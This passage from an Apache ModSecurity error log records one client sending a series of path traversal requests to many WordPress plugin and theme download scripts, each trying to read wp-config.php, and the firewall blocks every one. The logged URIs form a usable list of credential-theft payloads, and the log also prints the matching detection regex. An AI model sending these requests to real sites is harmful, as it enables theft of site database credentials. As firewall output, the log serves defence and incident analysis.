.vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "ZkeqNwHRq32rr8s-kdzkzwAAAMg"] [Fri May 17 14:04:28.527187 2024] [:error] [pid 8307:tid 140325473433344] [client 82.102.26.62:33522] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "ZkeqPBnTegMEbUYrnyHPqAAAAFM"] [Fri May 17 14:04:31.603387 2024] [:error] [pid 8308:tid 140325708326656] [client 82.102.26.62:33530] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/authentic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/authentic/includes/download.php"] [unique_id "ZkeqPyiHs15nDF7H6GoAaAAAAIA"] [Fri May 17 14:04:33.612965 2024] [:error] [pid 8307:tid 140325565753088] [client 82.102.26.62:33536] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZkeqQRnTegMEbUYrnyHPqwAAAEg"] [Fri May 17 14:04:41.686975 2024] [:error] [pid 8437:tid 140325431469824] [client 82.102.26.62:33556] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "ZkeqSQHRq32rr8s-kdzk2AAAANg"] [Fri May 17 14:04:45.410187 2024] [:error] [pid 8306:tid 140325691541248] [client 82.102.26.62:33566] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-document-embedder/libs/pdf.php"] [unique_id "ZkeqTWKrj0NgkohKdqGgZQAAAAI"] [Fri May 17 14:04:50.063171 2024] [:error] [pid 8307:tid 140325548967680] [client 82.102.26.62:33578] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZkeqUhnTegMEbUYrnyHPrgAAAEo"] [Fri May 17 14:04:50.253258 2024] [:error] [pid 8307:tid 140325532182272] [client 82.102.26.62:33580] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZkeqUhnTegMEbUYrnyHPrwAAAEw"] [Fri May 17 14:04:54.409548 2024] [:error] [pid 8307:tid 140325699933952] [client 82.102.26.62:33592] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "ZkeqVhnTegMEbUYrnyHPswAAAEE"] [Fri May 17 14:04:58.059079 2024] [:error] [pid 8306:tid 140325557360384] [client 82.102.26.62:33606] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php"] [unique_id "ZkeqWmKrj0NgkohKdqGgaAAAAAk"] [Fri May 17 14:05:07.700880 2024] [:error] [pid 8308:tid 140325540574976] [client 82.102.26.62:33634] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-import/admin/page.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-import/admin/page.php"] [unique_id "ZkeqYyiHs15nDF7H6GoAcQAAAIs"] [Fri May 17 14:05:07.866277 2024] [:error] [pid 8307:tid 140325683148544] [client 82.102.26.62:33636] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZkeqYxnTegMEbUYrnyHPtgAAAEM"] [Fri May 17 14:05:11.579037 2024] [:error] [pid 8306:tid 140325481826048] [client 82.102.26.62:33646] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "ZkeqZ2Krj0NgkohKdqGgbQAAABI"] [Fri May 17 14:05:12.663434 2024] [:error] [pid 8437:tid 140325708326656] [client 82.102.26.62:33650] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/u_parts/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/u_parts/force-download.php"] [unique_id "ZkeqaAHRq32rr8s-kdzk5wAAAMA"] [Fri May 17 14:05:12.820786 2024] [:error] [pid 8307:tid 140325431469824] [client 82.102.26.62:33652] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZkeqaBnTegMEbUYrnyHPtwAAAFg"] [Fri May 17 14:05:15.734467 2024] [:error] [pid 8308:tid 140325574145792] [client 82.102.26.62:33660] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php"] [unique_id "ZkeqayiHs15nDF7H6GoAdgAAAIc"] [Fri May 17 14:05:18.047211 2024] [:error] [pid 8306:tid 140325498611456] [client 82.102.26.62:33666] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-miniaudioplayer/map_download.php"] [unique_id "ZkeqbmKrj0NgkohKdqGgbwAAABA"] [Fri May 17 14:05:20.425982 2024] [:error] [pid 8307:tid 140325565753088] [client 82.102.26.62:33672] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php"] [unique_id "ZkeqcBnTegMEbUYrnyHPuAAAAEg"] [Fri May 17 14:05:23.763799 2024] [:error] [pid 8307:tid 140325557360384] [client 82.102.26.62:33680] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZkeqcxnTegMEbUYrnyHPugAAAEk"] [Fri May 17 14:05:25.665233 2024] [:error] [pid 8437:tid 140325574145792] [client 82.102.26.62:33686] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "ZkeqdQHRq32rr8s-kdzk7QAAAMc"] [Fri May 17 14:05:26.899134 2024] [:error] [pid 8437:tid 140325448255232] [client 82.102.26.62:33690] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/fluidracountry/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/fluidracountry/download.php"] [unique_id "ZkeqdgHRq32rr8s-kdzk7wAAANY"] [Fri May 17 14:05:40.077969 2024] [:error] [pid 8437:tid 140325666363136] [client 82.102.26.62:33722] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZkeqhAHRq32rr8s-kdzk9gAAAMU"] [Fri May 17 14:05:53.845463 2024] [:error] [pid 8437:tid 140325548967680] [client 82.102.26.62:33728] [client 82.102.26.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy 